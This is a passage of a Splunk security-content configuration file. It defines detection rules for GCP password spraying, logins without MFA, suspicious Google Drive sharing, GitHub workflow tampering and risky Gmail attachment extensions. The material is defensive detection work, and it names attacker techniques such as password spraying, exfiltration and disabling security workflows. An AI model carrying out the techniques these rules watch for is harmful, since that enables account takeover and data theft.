= 1 action.risk.param._risk_message = Multiple failed login attempts against users $tried_accounts$ seen from $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.type = login event.name = login_failure | bucket span=5m _time | stats count dc(user) AS unique_accounts values(user) as tried_accounts values(authentication_method) AS authentication_method earliest(_time) as firstTime latest(_time) as lastTime by _time event.name src app id.applicationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where unique_accounts > 20 | `gcp_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - GCP Successful Single-Factor Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = Although not recommended, certain users may be required without multi-factor authentication. Filter as needed action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Successful Single-Factor Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = Successful authentication for user $user$ without MFA action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Successful Single-Factor Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.notable.param.rule_title = GCP Successful Single-Factor Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.name=login_success NOT `gws_login_mfa_methods` | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, login_challenge_method, app, event.name, vendor_account, action |`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `gcp_successful_single_factor_authentication_filter` [ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source IP failing to authenticate into the Google Workspace with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against a Google Workspace enviroment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `GCP Multiple Users Failing To Authenticate From Ip` action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source IP failing to authenticate into the Google Workspace with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against a Google Workspace enviroment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `GCP Multiple Users Failing To Authenticate From Ip` action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We would also recommend tuning the detection by adjusting the window `span` and `unique_accounts` threshold values according to your environment. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = No known false positives for this detection. Please review this alert action.escu.creation_date = 2022-10-13 action.escu.modification_date = 2022-10-13 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = Unusual number of failed console login attempts against users $tried_accounts$ seen from $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.type = login event.name = login_failure| bucket span=5m _time | stats dc(user_name) AS unique_accounts values(user_name) as tried_accounts values(authentication_method) AS authentication_method by _time, src | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by _time | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier =1| `gcp_unusual_number_of_failed_authentications_from_ip_filter` [ESCU - Gdrive suspicious file sharing - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search can help the detection of compromised accounts or internal users sharing potentially malicious/classified documents with users outside your organization via GSuite file sharing . action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search can help the detection of compromised accounts or internal users sharing potentially malicious/classified documents with users outside your organization via GSuite file sharing . action.escu.how_to_implement = Need to implement Gsuite logging targeting Google suite drive activity. In order for the search to work for your environment please update `yourdomain.com` value in the query with the domain relavant for your organization. action.escu.known_false_positives = This is an anomaly search, you must specify your domain in the parameters so it either filters outside domains or focus on internal domains. This search may also help investigate compromise of accounts. By looking at for example source ip addresses, document titles and abnormal number of shares and shared target users. action.escu.creation_date = 2021-10-24 action.escu.modification_date = 2021-10-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Gdrive suspicious file sharing - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Spearphishing Attachments", "Data Exfiltration"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Gdrive suspicious file sharing - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_drive` name=change_user_access | rename parameters.* as * | search email = "*@yourdomain.com" target_user != "*@yourdomain.com" | stats count values(owner) as owner values(target_user) as target values(doc_type) as doc_type values(doc_title) as doc_title dc(target_user) as distinct_target by src_ip email | where distinct_target > 50 | `gdrive_suspicious_file_sharing_filter` [ESCU - GitHub Actions Disable Security Workflow - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a disabled security workflow in GitHub Actions. An attacker can disable a security workflow in GitHub actions to hide malicious code in it. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002", "T1195"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects a disabled security workflow in GitHub Actions. An attacker can disable a security workflow in GitHub actions to hide malicious code in it. action.escu.how_to_implement = You must index GitHub logs. You can follow the url in reference to onboard GitHub logs. Sometimes GitHub logs are truncated, make sure to disable it in props.conf. Replace *security-testing* with the name of your security testing workflow in GitHub Actions. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-04-04 action.escu.modification_date = 2022-04-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GitHub Actions Disable Security Workflow - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Security Workflow is disabled in branch $branch$ for repository $repository$ action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GitHub Actions Disable Security Workflow - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002", "T1195"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `github` workflow_run.event=push OR workflow_run.event=pull_request | stats values(workflow_run.name) as workflow_run.name by workflow_run.head_commit.id workflow_run.event workflow_run.head_branch workflow_run.head_commit.author.email workflow_run.head_commit.author.name workflow_run.head_commit.message workflow_run.head_commit.timestamp workflow_run.head_repository.full_name workflow_run.head_repository.owner.id workflow_run.head_repository.owner.login workflow_run.head_repository.owner.type | rename workflow_run.head_commit.author.name as user, workflow_run.head_commit.author.email as user_email, workflow_run.head_repository.full_name as repository, workflow_run.head_branch as branch | search NOT workflow_run.name=*security-testing* | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_actions_disable_security_workflow_filter` [ESCU - Github Commit Changes In Master - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a pushed or commit to master or main branch. This is to avoid unwanted modification to master without a review to the changes. Ideally in terms of devsecops the changes made in a branch and do a PR for review. of course in some cases admin of the project may did a changes directly to master branch action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a pushed or commit to master or main branch. This is to avoid unwanted modification to master without a review to the changes. Ideally in terms of devsecops the changes made in a branch and do a PR for review. of course in some cases admin of the project may did a changes directly to master branch action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to github logs having the fork, commit, push metadata that can be use to monitor the changes in a github project. action.escu.known_false_positives = admin can do changes directly to master branch action.escu.creation_date = 2021-08-20 action.escu.modification_date = 2021-08-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Github Commit Changes In Master - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious commit by $commit.commit.author.email$ to main branch action.risk.param._risk = [{"risk_object_field": "commit.commit.author.email", "risk_object_type": "other", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Github Commit Changes In Master - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `github` branches{}.name = main OR branches{}.name = master | stats count min(_time) as firstTime max(_time) as lastTime by commit.commit.author.email commit.author.login commit.commit.message repository.pushed_at commit.commit.committer.date repository.full_name | rename commit.author.login as user, repository.full_name as repository | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_commit_changes_in_master_filter` [ESCU - Github Commit In Develop - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a pushed or commit to develop branch. This is to avoid unwanted modification to develop without a review to the changes. Ideally in terms of devsecops the changes made in a branch and do a PR for review. of course in some cases admin of the project may did a changes directly to master branch action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a pushed or commit to develop branch. This is to avoid unwanted modification to develop without a review to the changes. Ideally in terms of devsecops the changes made in a branch and do a PR for review. of course in some cases admin of the project may did a changes directly to master branch action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to github logs having the fork, commit, push metadata that can be use to monitor the changes in a github project. action.escu.known_false_positives = admin can do changes directly to develop branch action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Github Commit In Develop - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious commit by $commit.commit.author.email$ to develop branch action.risk.param._risk = [{"risk_object_field": "commit.commit.author.email", "risk_object_type": "other", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Github Commit In Develop - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `github` branches{}.name = main OR branches{}.name = develop | stats count min(_time) as firstTime max(_time) as lastTime by commit.author.html_url commit.commit.author.email commit.author.login commit.commit.message repository.pushed_at commit.commit.committer.date | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_commit_in_develop_filter` [ESCU - GitHub Dependabot Alert - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is made by first searching for logs that contain the action "create" and renames certain fields for easier analysis. Then, this analytic uses the "stats" command to calculate the first and last occurrence of the alert based on the timestamp. The fields included in the output are the action, affected package name, affected range, created date, external identifier, external reference, fixed version, severity, repository, repository URL, and user. The "phase" field is set to "code" to indicate that the alert pertains to code-related issues. The detection is important because dependabot Alerts can indicate vulnerabilities in the codebase that can be exploited by attackers. Detecting and investigating these alerts can help a SOC to proactively address security risks and prevent potential breaches or unauthorized access to sensitive information. False positives might occur since there are legitimate actions that trigger the "create" action or if other factors exist that can generate similar log entries. Next steps include reviewing the details of the alert, such as the affected package, severity, and fixed version to determine the appropriate response and mitigation steps. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic is made by first searching for logs that contain the action "create" and renames certain fields for easier analysis. Then, this analytic uses the "stats" command to calculate the first and last occurrence of the alert based on the timestamp. The fields included in the output are the action, affected package name, affected range, created date, external identifier, external reference, fixed version, severity, repository, repository URL, and user. The "phase" field is set to "code" to indicate that the alert pertains to code-related issues. The detection is important because dependabot Alerts can indicate vulnerabilities in the codebase that can be exploited by attackers. Detecting and investigating these alerts can help a SOC to proactively address security risks and prevent potential breaches or unauthorized access to sensitive information. False positives might occur since there are legitimate actions that trigger the "create" action or if other factors exist that can generate similar log entries. Next steps include reviewing the details of the alert, such as the affected package, severity, and fixed version to determine the appropriate response and mitigation steps. action.escu.how_to_implement = You must index GitHub logs. You can follow the url in reference to onboard GitHub logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - GitHub Dependabot Alert - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Vulnerabilities found in packages used by GitHub repository $repository$ action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GitHub Dependabot Alert - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `github` alert.id=* action=create | rename repository.full_name as repository, repository.html_url as repository_url sender.login as user | stats min(_time) as firstTime max(_time) as lastTime by action alert.affected_package_name alert.affected_range alert.created_at alert.external_identifier alert.external_reference alert.fixed_in alert.severity repository repository_url user | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_dependabot_alert_filter` [ESCU - GitHub Pull Request from Unknown User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects pull requests from unknown users on GitHub. The detection is made by using a Splunk query to search for pull requests in the `check_suite.pull_requests` field where the `id` is not specified. Next, the analytic retrieves information such as the author's name, the repository's full name, the head reference of the pull request, and the commit message from the `check_suite.head_commit` field. The analytic also includes a step to exclude known users by using the `github_known_users` lookup table, which helps to filter out pull requests from known users and focus on the pull requests from unknown users. The detection is important because it locates potential malicious activity or unauthorized access since unknown users can introduce malicious code or gain unauthorized access to repositories leading to unauthorized code changes, data breaches, or other security incidents. Next steps include reviewing the author's name, the repository involved, the head reference of the pull request, and the commit message upon triage of a potential pull request from an unknown user. You must also analyze any relevant on-disk artifacts and investigate any concurrent processes to determine the source and intent of the pull request." action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects pull requests from unknown users on GitHub. The detection is made by using a Splunk query to search for pull requests in the `check_suite.pull_requests` field where the `id` is not specified. Next, the analytic retrieves information such as the author's name, the repository's full name, the head reference of the pull request, and the commit message from the `check_suite.head_commit` field. The analytic also includes a step to exclude known users by using the `github_known_users` lookup table, which helps to filter out pull requests from known users and focus on the pull requests from unknown users. The detection is important because it locates potential malicious activity or unauthorized access since unknown users can introduce malicious code or gain unauthorized access to repositories leading to unauthorized code changes, data breaches, or other security incidents. Next steps include reviewing the author's name, the repository involved, the head reference of the pull request, and the commit message upon triage of a potential pull request from an unknown user. You must also analyze any relevant on-disk artifacts and investigate any concurrent processes to determine the source and intent of the pull request." action.escu.how_to_implement = You must index GitHub logs. You can follow the url in reference to onboard GitHub logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - GitHub Pull Request from Unknown User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Vulnerabilities found in packages used by GitHub repository $repository$ action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GitHub Pull Request from Unknown User - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `github` check_suite.pull_requests{}.id=* | stats count by check_suite.head_commit.author.name repository.full_name check_suite.pull_requests{}.head.ref check_suite.head_commit.message | rename check_suite.head_commit.author.name as user repository.full_name as repository check_suite.pull_requests{}.head.ref as ref_head check_suite.head_commit.message as commit_message | search NOT `github_known_users` | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_pull_request_from_unknown_user_filter` [ESCU - Gsuite Drive Share In External Email - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search is to detect suspicious google drive or google docs files shared outside or externally. This behavior might be a good hunting query to monitor exfitration of data made by an attacker or insider to a targetted machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567.002", "T1567"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect suspicious google drive or google docs files shared outside or externally. This behavior might be a good hunting query to monitor exfitration of data made by an attacker or insider to a targetted machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. In order for the search to work for your environment, please edit the query to use your company specific email domain instead of `internal_test_email.com`. action.escu.known_false_positives = network admin or normal user may share files to customer and external team. action.escu.creation_date = 2021-08-16 action.escu.modification_date = 2021-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Drive Share In External Email - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops", "Insider Threat"] action.risk = 1 action.risk.param._risk_message = suspicious share gdrive from $parameters.owner$ to $email$ namely as $parameters.doc_title$ action.risk.param._risk = [{"risk_object_field": "parameters.owner", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "email", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Gsuite Drive Share In External Email - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567.002", "T1567"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_drive` NOT (email IN("", "null")) | rex field=parameters.owner "[^@]+@(?[^@]+)" | rex field=email "[^@]+@(?[^@]+)" | where src_domain = "internal_test_email.com" and not dest_domain = "internal_test_email.com" | eval phase="plan" | eval severity="low" | stats values(parameters.doc_title) as doc_title, values(parameters.doc_type) as doc_types, values(email) as dst_email_list, values(parameters.visibility) as visibility, values(parameters.doc_id) as doc_id, count min(_time) as firstTime max(_time) as lastTime by parameters.owner ip_address phase severity | rename parameters.owner as user ip_address as src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_drive_share_in_external_email_filter` [ESCU - GSuite Email Suspicious Attachment - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious attachment file extension in Gsuite email that may related to spear phishing attack. This file type is commonly used by malware to lure user to click on it to execute malicious code to compromised targetted machine. But this search can also catch some normal files related to this file type that maybe send by employee or network admin. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious attachment file extension in Gsuite email that may related to spear phishing attack. This file type is commonly used by malware to lure user to click on it to execute malicious code to compromised targetted machine. But this search can also catch some normal files related to this file type that maybe send by employee or network admin. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = network admin and normal user may send this file attachment as part of their day to day work. having a good protocol in attaching this file type to an e-mail may reduce the risk of having a spear phishing attack. action.escu.creation_date = 2021-08-16 action.escu.modification_date = 2021-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - GSuite Email Suspicious Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "destination{}.address", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GSuite Email Suspicious Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` "attachment{}.file_extension_type" IN ("pl", "py", "rb", "sh", "bat", "exe", "dll", "cpl", "com", "js", "vbs", "ps1", "reg","swf", "cmd", "go") | eval phase="plan" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime values(attachment{}.file_extension_type) as email_attachments, values(attachment{}.sha256) as attachment_sha256, values(payload_size) as payload_size by destination{}.service num_message_attachments subject destination{}.address source.address phase severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_email_suspicious_attachment_filter` [ESCU - Gsuite Email Suspicious Subject With Attachment - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a gsuite email contains 